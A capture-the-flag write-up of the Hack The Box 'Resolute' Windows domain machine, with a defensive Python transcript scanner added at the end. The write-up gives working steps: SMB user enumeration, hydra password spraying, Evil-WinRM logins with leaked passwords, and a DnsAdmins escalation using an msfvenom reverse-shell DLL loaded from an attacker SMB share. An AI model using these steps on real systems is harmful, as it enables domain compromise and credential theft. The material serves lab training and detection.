Hack The Box Resolute
Resolute
tags: HTB
Medium
Procedure
User Flag
nmap
PORT      STATE SERVICE      VERSION
53/tcp    open  domain       Microsoft DNS
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-05-09 01:19:47Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: MEGABANK)
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49676/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc        Microsoft Windows RPC
49688/tcp open  msrpc        Microsoft Windows RPC
49709/tcp open  msrpc        Microsoft Windows RPC
62192/tcp open  tcpwrapped
63729/tcp open  tcpwrapped
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Network Distance: 2 hops
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows
Looks like a Windows Server running Active Directory.
nmap script
$ sudo nmap -p445 --script smb-enum-shares,smb-enum-users 10.10.10.169
Starting Nmap 7.60 ( https://nmap.org ) at 2020-05-09 10:38 JST
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-enum-shares:
|   note: ERROR: Enumerating shares failed, guessing at common ones (NT_STATUS_ACCESS_DENIED)
|   account_used: <blank>
|   \\10.10.10.169\ADMIN$:
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: <none>
|   \\10.10.10.169\C$:
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: <none>
|   \\10.10.10.169\IPC$:
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|     Anonymous access: READ
|   \\10.10.10.169\NETLOGON:
|     warning: Couldn't get details for share: NT_STATUS_ACCESS_DENIED
|_    Anonymous access: <none>
| smb-enum-users:
|   MEGABANK\abigail (RID: 6602)
|     Flags:       Normal user account
|   MEGABANK\Administrator (RID: 500)
|     Description: Built-in account for administering the computer/domain
|     Flags:       Password does not expire, Normal user account
|   MEGABANK\angela (RID: 6606)
|     Flags:       Normal user account
|   MEGABANK\annette (RID: 6614)
|     Flags:       Normal user account
|   MEGABANK\annika (RID: 6615)
|     Flags:       Normal user account
|   MEGABANK\claire (RID: 6611)
|     Flags:       Normal user account
|   MEGABANK\claude (RID: 6617)
|     Flags:       Normal user account
|   MEGABANK\DefaultAccount (RID: 503)
|     Description: A user account managed by the system.
|     Flags:       Password not required, Account disabled, Password does not expire, Normal user account
|   MEGABANK\felicia (RID: 6607)
|     Flags:       Normal user account
|   MEGABANK\fred (RID: 6605)
|     Flags:       Normal user account
|   MEGABANK\Guest (RID: 501)
|     Description: Built-in account for guest access to the computer/domain
|     Flags:       Password not required, Account disabled, Password does not expire, Normal user account
|   MEGABANK\gustavo (RID: 6608)
|     Flags:       Normal user account
|   MEGABANK\krbtgt (RID: 502)
|     Description: Key Distribution Center Service Account
|     Flags:       Account disabled, Normal user account
|   MEGABANK\marcus (RID: 6603)
|     Flags:       Normal user account
|   MEGABANK\marko (RID: 1111)
|     Full name:   Marko Novak
|     Description: Account created. Password set to Welcome123!
|     Flags:       Password does not expire, Normal user account
|   MEGABANK\melanie (RID: 10101)
|     Flags:       Normal user account
|   MEGABANK\naoki (RID: 10104)
|     Flags:       Normal user account
|   MEGABANK\paulo (RID: 6612)
|     Flags:       Normal user account
|   MEGABANK\per (RID: 6616)
|     Flags:       Normal user account
|   MEGABANK\ryan (RID: 1105)
|     Full name:   Ryan Bertrand
|_    Flags:       Password does not expire, Normal user account
The Description field for marko says "Account created. Password set to Welcome123!", which is highly suspicious.
smb login attempt
Try logging in with smbclient using the credentials marko/Welcome123!.
$ smbclient -U marko -L 10.10.10.169
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\marko's password:
session setup failed: NT_STATUS_LOGON_FAILURE
That doesn't seem to work... While we're at it, try this password as a dictionary attack against every user.
$ hydra -L userlist.txt -p Welcome123! 10.10.10.169 smb
Hydra v8.6 (c) 2017 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (http://www.thc.org/thc-hydra) starting at 2020-05-09 10:54:01
[INFO] Reduced number of tasks to 1 (smb does not like parallel connections)
[DATA] max 1 task per 1 server, overall 1 task, 27 login tries (l:27/p:1), ~27 tries per task
[DATA] attacking smb://10.10.10.169:445/
[445][smb] host: 10.10.10.169   login: melanie   password: Welcome123!
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2020-05-09 10:54:19
Hit on the melanie account!
Log in again with smbclient.
$ smbclient -U melanie -L 10.10.10.169
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\melanie's password:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share
        SYSVOL          Disk      Logon server share

$ smbclient -U melanie \\\\10.10.10.169\\NETLOGON
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\melanie's password:
smb: \> ls
  .                                   D        0  Wed Sep 25 22:28:21 2019
  ..                                  D        0  Wed Sep 25 22:28:21 2019

                10340607 blocks of size 4096. 7561451 blocks available
Login successful! Nothing in NETLOGON, so log in to SYSVOL instead.
$ smbclient -U melanie \\\\10.10.10.169\\SYSVOL
WARNING: The "syslog" option is deprecated
Enter WORKGROUP\melanie's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Sep 25 22:28:21 2019
  ..                                  D        0  Wed Sep 25 22:28:21 2019
  megabank.local                      D        0  Wed Sep 25 22:28:21 2019
Downloaded the directory tree under megabank.local, but there is nothing of interest in it.
$ tree ./
./
├── {31B2F340-016D-11D2-945F-00C04FB984F9}
│   ├── GPT.INI
│   ├── MACHINE
│   │   ├── Microsoft
│   │   │   └── Windows NT
│   │   │       └── SecEdit
│   │   │           └── GptTmpl.inf
│   │   └── Scripts
│   │       ├── Shutdown
│   │       └── Startup
│   └── USER
├── {6AC1786C-016F-11D2-945F-00C04fB984F9}
│   ├── GPT.INI
│   ├── MACHINE
│   │   └── Microsoft
│   │       └── Windows NT
│   │           └── SecEdit
│   │               └── GptTmpl.inf
│   └── USER
├── nmap_sV_fullport.txt
└── userlist.txt
Use the credentials we obtained to try to pull more information out of the server.
Use ldapdomaindump.
$ ldapdomaindump -u MEGABANK\\melanie -p Welcome123! 10.10.10.169
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
$ firefox *.html
It dumps all sorts of information from the LDAP server. melanie is a member of the Remote Management Users group. Remote Management is, as the name says, the feature that lets you manage the server remotely; it is enabled by default on Windows Server 2016 and later. The default port is 5985/tcp.
Exploit
Get access with a shell tool built for Remote Management.
$ ./evil-winrm.rb -u melanie -p Welcome123! -i 10.10.10.169

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\melanie\Documents>
*Evil-WinRM* PS C:\Users\melanie\Desktop> ls

    Directory: C:\Users\melanie\Desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---       12/3/2019   7:33 AM             32 user.txt
Found the file we were after. Flag obtained!!
local recon
Check whether there are other user directories. There seems to be a user named ryan.
PS C:\Users\melanie\Documents> ls ../../

    Directory: C:\Users

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/25/2019  10:43 AM                Administrator
d-----        12/4/2019   2:46 AM                melanie
d-r---       11/20/2016   6:39 PM                Public
d-----        9/27/2019   7:05 AM                ryan
There is a hidden directory directly under C:\, and under it sits a transcript. A transcript is a PowerShell session log written out to a text file. !!Directory walking matters!!
*Evil-WinRM* PS C:\> dir -hidden

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        12/3/2019   6:40 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        5/10/2020   8:35 PM      402653184 pagefile.sys

*Evil-WinRM* PS C:\> cd PSTranscripts
*Evil-WinRM* PS C:\PSTranscripts> dir -hidden

    Directory: C:\PSTranscripts

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--h--        12/3/2019   6:45 AM                20191203

*Evil-WinRM* PS C:\PSTranscripts> cd 20191203
*Evil-WinRM* PS C:\PSTranscripts\20191203> dir -hidden

    Directory: C:\PSTranscripts\20191203

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
Looking inside, there is a record of ryan mounting a backup share, and the password was passed as a command-line argument.
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
We can log in with the ryan account.
$ /opt/evil-winrm/evil-winrm.rb -u ryan -p Serv3r4Admin4cc123! -i 10.10.10.169

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami
megabank\ryan
ryan is in the Contractors group and in the DnsAdmins group. Googling 'dnsadmin exploit' turns up a privilege-escalation article: the idea is to have the DNS service process load a DLL that spawns a reverse shell. Build the DLL as the article describes,
$ msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.XX.XX LPORT=4444 -f dll > privesc.dll
stand up an SMB server on my own machine,
$ python3 /opt/impacket/examples/smbserver.py share ./
start a listener,
$ nc -lvnp 4444
point the DNS service at the DLL and restart dns, and then:
*Evil-WinRM* PS C:\Users\ryan\Documents> dnscmd.exe /config /serverlevelplugindll \\10.10.15.3\share\privesc.dll

Registry property serverlevelplugindll successfully reset.
Command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe stop dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 3  STOP_PENDING
                                (STOPPABLE, PAUSABLE, ACCEPTS_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x0

*Evil-WinRM* PS C:\Users\ryan\Documents> sc.exe start dns

SERVICE_NAME: dns
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0
        PID                : 2444
        FLAGS              :
The reverse shell fired. Privilege escalation complete; all that's left is to grab the flag.
$ nc -lnvp 4444
Listening on [0.0.0.0] (family 0, port 4444)
Connection from 10.10.10.169 56314 received!
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system
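Both footholds on this box leave a trace in PowerShell transcripts: the ryan password in a "net use" argument, and a dnscmd call that sets serverlevelplugindll to a UNC path. Added example (not part of the original writeup, nor from any tool it uses): a small Python scanner a defender could run over files under PSTranscripts to flag exactly those two patterns; the sample transcript and its placeholder password are constructed, and the dnscmd line mirrors the step shown above.

```python
import re

# Constructed sample in the shape of the PSTranscripts entries on this page (not the real file);
# the password is a placeholder, and the dnscmd line mirrors the plugin-DLL step above.
SAMPLE_TRANSCRIPT = r"""**********************
Command start time: 20191203063455
**********************
PS>CommandInvocation(Invoke-Expression): "Invoke-Expression"
>> ParameterBinding(Invoke-Expression): name="Command"; value="cmd /c net use X: \\fs01\backups ryan PLACEHOLDER_PASSWORD"
PS>Get-ChildItem C:\Users
>> ParameterBinding(Invoke-Expression): name="Command"; value="dnscmd.exe /config /serverlevelplugindll \\10.10.15.3\share\privesc.dll"
"""

# net use <drive> <\\server\share> <rest...>; the credential form is decided in parse_net_use
NET_USE = re.compile(r"net\s+use\s+\S+\s+(\\\\\S+)\s+(.*)", re.IGNORECASE)
# dnscmd changing the DNS server's plugin DLL (a UNC path means it is loaded from a remote share)
DNS_PLUGIN = re.compile(r"dnscmd(?:\.exe)?\s+/config\s+/serverlevelplugindll\s+(\S+)", re.IGNORECASE)

def parse_net_use(line):
    """Return (user, secret) when 'net use' carries an inline password, else None. Handles both
    '<share> <user> <password>' (the form in this box's transcript) and '<share> <password> /user:<name>'."""
    m = NET_USE.search(line)
    if not m:
        return None
    user, positional = None, []
    for tok in m.group(2).rstrip('"').split():
        if tok.lower().startswith("/user:"):
            user = tok[6:]
        elif not tok.startswith("/"):      # skip other switches such as /persistent:no
            positional.append(tok)
    if user is None and len(positional) >= 2:
        return positional[0], positional[1]
    if positional:
        return user, positional[0]
    return None

def scan_transcript(text):
    """Walk a transcript line by line; return (line_no, rule, detail) findings, never echoing the secret."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        cred = parse_net_use(line)
        if cred:
            user, secret = cred
            findings.append((n, "net-use-inline-credential",
                             f"user={user} secret=<redacted:{len(secret)} chars>"))
        m = DNS_PLUGIN.search(line)
        if m:
            dll = m.group(1).rstrip('"')
            kind = "UNC" if dll.startswith("\\\\") else "local"
            findings.append((n, "dns-serverlevelplugindll-set", f"dll={dll} ({kind})"))
    return findings
```

Run scan_transcript over each file in C:\PSTranscripts (or wherever transcription is configured to write); a hit on either rule is worth a credential rotation or a look at who changed the DNS plugin setting.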